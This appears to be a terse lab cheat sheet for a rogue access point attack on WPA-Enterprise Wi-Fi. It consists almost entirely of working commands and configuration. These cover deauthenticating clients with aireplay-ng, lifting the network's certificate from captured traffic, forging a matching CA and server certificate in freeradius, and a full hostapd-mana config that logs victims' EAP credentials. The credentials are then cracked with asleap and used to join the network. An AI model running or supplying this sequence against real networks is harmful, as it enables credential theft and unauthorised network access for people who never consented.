WPA-MGT
WPA-Enterpise rogue AP attack
Setup
sudo airmon-ng check kill
sudo airmon-ng start wlan0sudo airodump-ng wlan0monCapture + output as recon-01.pcap
# -c channel -w output filename = recon-0#
sudo airodump-ng -c # --essid AP_NAME --bssid XX:XX:XX:XX:XX:XX -w recon --output-format pcap wlan0monMay deauth a client once to get reconnection for cert info
#-a AP -c Client
sudo aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY wlan0monReview the traffic / recon-01.pcap to get cert info
#wireshark filter
tls.handshake.type == 11,3
# or
tls.handshake.certificate
Review cert info
openssl x509 -inform der -in CERTIFICATE_FILENAME -textPreparation
Edit freeradius cert config (as root user)
# /etc/freeradius/3.0/certs/ca.cnf ([email protected])
[certificate_authority]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = [email protected]
commonName = "Playtronics Certificate Authority"# /etc/freeradius/3.0/certs/server.cnf ([email protected])
[server]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = [email protected]
commonName = "Playtronics"Create fake cert (as root user)
sudo su
cd /etc/freeradius/3.0/certs/
rm dh && make
#normal to receive error as we didn't config client.cnf as no needSetup rogue AP with hostapd-mana
Create mana.conf and mana.eap_user to /etc/hostapd-mana/ (as root)
mana.conf and mana.eap_user to /etc/hostapd-mana/ (as root)#/etc/hostapd-mana/mana.eap_user
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]#/etc/hostapd-mana/mana.conf
# SSID of the AP
ssid=Playtronics #########UPDATE##########
# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=wlan0
driver=nl80211
# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)
channel=1 #########UPDATE##########
# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
hw_mode=g #2.4GHz, a if 5GHz#
# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1
# Key workaround for Win XP
eapol_key_index_workaround=0
# EAP user file we created earlier
eap_user_file=/etc/hostapd-mana/mana.eap_user
# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
# Open authentication
auth_algs=1
# WPA/WPA2
wpa=3
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP
# Enable Mana WPE
mana_wpe=1
# Store credentials in that file
mana_credout=/tmp/hostapd.credout
# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1
# EAP TLS MitM
mana_eaptls=1Launch rogue AP
sudo hostapd-mana /etc/hostapd-mana/mana.confRetrieve credentials with asleap command provided by mana
# -W append wordlist to the asleap crack command
<asleap cmd> -W usr/share/john/password.lst
Connect to the network with retrieved credentials
Create wpa_supplicant.conf
wpa_supplicant.conf network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}Connect to network
wpa_supplicant -c <config file>
sudo dhclient wlan0Get proof
curl http://192.168.1.1/proof.txtLast updated